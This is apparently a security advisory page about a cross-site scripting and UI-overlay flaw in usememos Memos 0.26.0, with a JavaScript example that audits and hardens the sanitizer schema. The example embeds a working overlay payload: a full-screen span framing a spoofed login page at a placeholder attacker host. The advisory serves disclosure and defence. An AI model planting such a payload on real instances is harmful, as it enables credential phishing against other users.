usememos Memos Cross-Site Scripting Vulnerability

Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in usememos Memos version 0.26.0. It allows a remote, authenticated attacker to inject attacker-controlled markup that is rendered in the context of other users' browsers. The weakness is in the application's Markdown rendering component, whose sanitization allowlist ('SANITIZE_SCHEMA') does not adequately restrict user-generated content: it permits 'style' attributes on 'span' elements and allows 'iframe' embeds that are not sandboxed. As a result, an authenticated user can craft a memo that, when viewed by other users, overlays the entire application interface with attacker-controlled content, which can be used to steal credentials by spoofing a login prompt.

Impact

Exploitation of this vulnerability results in cross-site scripting: attacker-controlled markup from a memo is rendered in the victim's browser within the application's origin. The practical consequence is a UI overlay attack in which an embedded frame covers the real interface, so a victim who believes the session has expired may type credentials into an attacker-controlled login form. The risk is highest on shared, multi-user instances, where a malicious memo is visible to other accounts.

Reproduction

To reproduce this vulnerability, an authenticated user creates a memo containing a 'span' element styled with 'position: fixed', 'top', 'left', 'width', 'height', and a high 'z-index' value, so that it is anchored to the viewport and drawn above the application's own elements. Inside the span, the memo embeds an 'iframe' element whose 'src' points to an attacker-controlled page, such as a spoofed login form. Because the sanitizer retains both the 'style' attribute and the unsandboxed 'iframe', the markup survives rendering. Once the memo is shared and opened by another user, the injected content covers the application interface, producing a convincing phishing scenario.
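The example below is added here to illustrate both the weakness described under Vulnerability and the reproduction steps above; it is not code from the Memos project. It models an allowlist sanitizer schema in the shape used by hast-util-sanitize (tagNames / attributes / required), shows why the fixed-position span plus iframe payload passes a schema that permits 'style' on 'span' and unsandboxed 'iframe', and how a hardened schema neutralizes it. The schema contents, the 'attacker.example' host and the tiny tag filter are all assumptions for illustration; the filter is not a real HTML parser and must not be used as a sanitizer.

```javascript
// Added example, not Memos code. Schema shape loosely follows hast-util-sanitize
// (tagNames / attributes / required); the values are assumptions, not the
// project's actual SANITIZE_SCHEMA.

const WEAK_SCHEMA = {
  tagNames: ['p', 'span', 'a', 'iframe'],
  attributes: {
    span: ['style'],                       // lets a memo position elements freely
    a: ['href'],
    iframe: ['src', 'width', 'height'],    // no sandbox is ever enforced
  },
  required: {},
};

const HARDENED_SCHEMA = {
  tagNames: ['p', 'span', 'a', 'iframe'],
  attributes: {
    span: [],                              // no inline style on span at all
    a: ['href'],
    iframe: ['src', 'width', 'height', 'sandbox'],
  },
  required: { iframe: { sandbox: '' } },   // every iframe gets an empty sandbox
};

// Constructed memo body an authenticated user could submit: a fixed,
// full-viewport span with a very high z-index wrapping an attacker-hosted frame.
// attacker.example is a placeholder host.
const PAYLOAD =
  '<p>Meeting notes</p>' +
  '<span style="position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:2147483647">' +
  '<iframe src="https://attacker.example/login"></iframe></span>';

// Audit a schema for the two allowances the advisory names: any tag that may
// carry a style attribute, and an iframe that is not forced into a sandbox.
function dangerousAllowances(schema) {
  const findings = [];
  for (const [tag, attrs] of Object.entries(schema.attributes)) {
    if (attrs.includes('style')) findings.push(`style allowed on <${tag}>`);
  }
  const iframeAllowed = schema.tagNames.includes('iframe');
  const sandboxForced = Boolean(schema.required.iframe) && 'sandbox' in schema.required.iframe;
  if (iframeAllowed && !sandboxForced) findings.push('<iframe> allowed without required sandbox');
  return findings;
}

// Minimal tag-level filter (demo only): keeps allowed tags, strips attributes
// not in the allowlist, adds required attributes, and drops disallowed tags.
// It only understands double-quoted attributes and is not a real HTML parser.
function sanitize(html, schema) {
  const attrRe = /([a-zA-Z-]+)\s*=\s*"([^"]*)"/g;
  return html.replace(/<(\/?)([a-zA-Z0-9]+)([^>]*)>/g, (match, close, rawTag, rawAttrs) => {
    const tag = rawTag.toLowerCase();
    if (!schema.tagNames.includes(tag)) return '';
    if (close) return `</${tag}>`;
    const allowed = schema.attributes[tag] || [];
    const kept = {};
    for (const [, name, value] of rawAttrs.matchAll(attrRe)) {
      if (allowed.includes(name.toLowerCase())) kept[name.toLowerCase()] = value;
    }
    Object.assign(kept, schema.required[tag] || {});
    const attrText = Object.entries(kept).map(([k, v]) => ` ${k}="${v}"`).join('');
    return `<${tag}${attrText}>`;
  });
}

function demo() {
  return {
    weakFindings: dangerousAllowances(WEAK_SCHEMA),
    hardenedFindings: dangerousAllowances(HARDENED_SCHEMA),
    weakOutput: sanitize(PAYLOAD, WEAK_SCHEMA),
    hardenedOutput: sanitize(PAYLOAD, HARDENED_SCHEMA),
  };
}

console.log(demo());
```

Under the weak schema the payload comes out unchanged, so the overlay renders exactly as the attacker wrote it. Under the hardened schema the span loses its positioning and the iframe is emitted with an empty 'sandbox' attribute, which also blocks scripts and top-level navigation inside the frame; a spoofed login page in that frame can still display a form, so dropping 'iframe' from the allowlist entirely, or restricting 'src' to trusted hosts, is the stricter choice. This hardening is the example's approach, not a published fix from the project.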

Added: Jun 2, 2026, 8:37 PM
Updated: Jun 2, 2026, 8:37 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 1.7
exploitability: 4.4
remediation: 0.0
relevance: 9.8
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.